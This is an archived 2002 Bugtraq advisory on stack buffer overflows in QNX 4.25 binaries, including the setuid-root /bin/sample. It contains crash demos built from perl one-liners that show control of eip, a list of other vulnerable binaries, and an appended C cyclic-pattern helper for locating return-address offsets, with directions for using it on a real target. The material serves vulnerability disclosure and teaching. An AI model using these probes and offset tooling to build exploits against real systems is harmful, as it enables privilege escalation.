[25743] in bugtraq
madcr: QnX 4.25 - multiples bof in suid/no suid files
daemon@ATHENA.MIT.EDU (Egor Egorov)
Wed Jun 12 13:05:20 2002
Date: 12 Jun 2002 12:10:46 -0000
Message-ID: <20020612121046.17184.qmail@www5.securityfocus.com>
From: Egor Egorov <madrats@mail.ru>
To: bugtraq@securityfocus.com
/bin/sample
----------------//------------------------------
# cd /bin
# ls -l sample
-rwsrwxr-x 1 root root 20639 Jan 19 1996 sample
# sample `perl -e 'print "A" x 280'`
Profile based upon 2000 samples/second.
//1/bin/sample terminated (SIGSEGV) at 0005:00000041
%1 672 Memory fault sample $(perl -e 'print "A" x 280')
# wd sample `perl -e 'print "A" x 280'`
ebp: 41414141
eip: 00000041
# wd sample `perl -e 'print "A" x 280, "B"'`
ebp: 41414141
eip: 00004241
----------------//------------------------------
/bin/ex
----------------//------------------------------
# wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
ebp: 00000041
eip: 646f6f67 - doog
----------------//------------------------------
file - bytes for bof
/bin/du - 558
/bin/find - 799
/bin/lex - 1673
/bin/mkdir - 517
/bin/rm - 351
/bin/serserv - 224
/bin/tcpserv - 146
/bin/termdef - 729
/bin/time - 2489
/bin/unzip - 299
/bin/use - 1964
/bin/wcc - 138
/bin/wcc386 - 137
/bin/wd -
/bin/wdisasm - 135
/bin/which - 304
/bin/wlib - 256
/bin/wlink - 10244
/bin/wpp - 256
/bin/wpp386 - 256
/bin/wprof - 141
/bin/write - 157
/bin/wstrip - 817
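The post finds the return-address offset by hand: "A"x280 followed by "B" shows up as eip 00004241 (low byte 'A', then 'B', then the string's NUL), and "AAA"x420 + "good" + "CCC"x280 lands the bytes "good" in eip, which the debugger prints big-endian as 646f6f67 ("doog"). The following C program is an added example that is not part of Egor's post or of QNX: it generalizes that probing with a cyclic pattern in which every 4-byte window is unique, so a single crash gives the exact offset instead of a series of A/B guesses. It assumes a 32-bit little-endian x86 target (QNX 4 on PC hardware) and a debugger that prints eip as a hex word, as wd does above; the crash it processes is constructed in memory, not taken from a real binary. The function names (pattern_create, pattern_offset, eip_spells, recover_offset) are this example's own.

```c
/* Cyclic-pattern helper for locating the saved-return-address offset in a
 * stack overflow. Added example; not code from the post or from QNX.
 * Assumptions: 32-bit little-endian target (x86), and a debugger that prints
 * the faulting eip as one hex word (as the post's wd output does). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Metasploit-style pattern "Aa0Aa1...Az9Ba0...": every 4-byte window is unique
 * within the first 26*26*10*3 = 20280 bytes. Writes len bytes plus a NUL, so
 * buf must hold len+1 bytes. Returns the number of pattern bytes written. */
size_t pattern_create(char *buf, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char triple[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = triple[i];
            }
    buf[n] = '\0';
    return n;
}

/* Read 4 bytes the way a little-endian CPU loads them into eip. */
uint32_t le_word(const char *p)
{
    const unsigned char *b = (const unsigned char *)p;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* 0-based offset of the 4 pattern bytes that became eip, or -1 if absent. */
long pattern_offset(const char *pat, size_t len, uint32_t eip)
{
    for (size_t i = 0; i + 4 <= len; i++)
        if (le_word(pat + i) == eip)
            return (long)i;
    return -1;
}

/* Decode an eip value back to the ASCII that overwrote it, low byte first,
 * stopping at the first NUL: 0x646f6f67 -> "good", 0x00004241 -> "AB".
 * Returns 1 if it spells `word`, else 0. */
int eip_spells(uint32_t eip, const char *word)
{
    char s[5] = { 0 };
    for (int i = 0; i < 4; i++) {
        unsigned char c = (eip >> (8 * i)) & 0xff;
        if (c == 0)
            break;
        s[i] = (char)c;
    }
    return strcmp(s, word) == 0;
}

/* The whole workflow on a constructed crash: send a pat_len-byte pattern, the
 * target dies with eip equal to the pattern bytes at crash_off (what a real
 * debugger would print), and the offset is recovered from eip alone. */
long recover_offset(size_t pat_len, size_t crash_off)
{
    char *pat = malloc(pat_len + 1);
    if (!pat || crash_off + 4 > pat_len) {
        free(pat);
        return -1;
    }
    pattern_create(pat, pat_len);
    uint32_t eip = le_word(pat + crash_off);   /* simulated debugger output */
    long off = pattern_offset(pat, pat_len, eip);
    free(pat);
    return off;
}

int main(void)
{
    /* The post's /bin/sample case: "A"x280,"B" gave eip 00004241, so the
     * return address starts at the 280th byte (offset 279); the 41414141 in
     * ebp is the 4 bytes just before it. */
    printf("0x00004241 spells \"AB\": %d\n", eip_spells(0x00004241, "AB"));
    printf("0x646f6f67 spells \"good\": %d\n", eip_spells(0x646f6f67, "good"));
    printf("offset recovered from simulated crash: %ld\n",
           recover_offset(600, 279));
    return 0;
}
```

To use it against a real target, print the pattern from pattern_create as the argument (in place of the perl one-liners above), read eip from wd, and pass it to pattern_offset; the returned offset is where the 4-byte return address goes, with the saved ebp at offset minus 4. The per-file byte counts in the post's list are the argument lengths at which each binary first faults, not the offsets themselves, so run the pattern once per binary rather than reusing 280.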